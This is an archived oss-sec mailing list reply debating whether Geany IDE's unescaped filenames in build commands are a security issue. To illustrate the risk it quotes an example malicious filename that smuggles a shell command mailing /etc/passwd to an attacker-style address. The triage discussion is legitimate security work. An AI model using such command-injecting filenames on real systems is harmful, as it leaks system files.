Home page logo

oss-sec logo oss-sec mailing list archives

Re: Geany IDE not escaping filenames during compilation / build - a security issue or not?
From: Andreas Ericsson <ae () op5 se>
Date: Thu, 13 Dec 2012 11:52:26 +0100

On 12/13/2012 06:54 AM, Eitan Adler wrote:
On 12 December 2012 11:51, Jan Lieskovsky <jlieskov () redhat com> wrote:
The questions:
1) should Geany escape the filenames?,

Up to the maintainers.

2) is this a security issue or not?

Unlikely.  Is there a way a malicious document could cause code
execution without user action?

Extremely unlikely. The way to get someone to trigger this is to send
a source-file to a developer who then opens it in geany without realizing
that the file is named "mail evil () hackdom com -s teehee < /etc/passwd".
The "attacked" developer then need to attempt to build it from geany's
internal "build now" button.

A simpler misdeed of similar charactaristics would be to ship a bogus
./configure script that people (who are not developers, mind you)
blindly run and which executes bogus commands on behalf of the logged
in user.

Since the latter isn't really CVE-worthy, I doubt the former even
comes close.

Andreas Ericsson                   andreas.ericsson () op5 se
OP5 AB                             www.op5.se
Tel: +46 8-230225                  Fax: +46 8-230231

Considering the successes of the wars on alcohol, poverty, drugs and
terror, I think we should give some serious thought to declaring war
on peace.

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]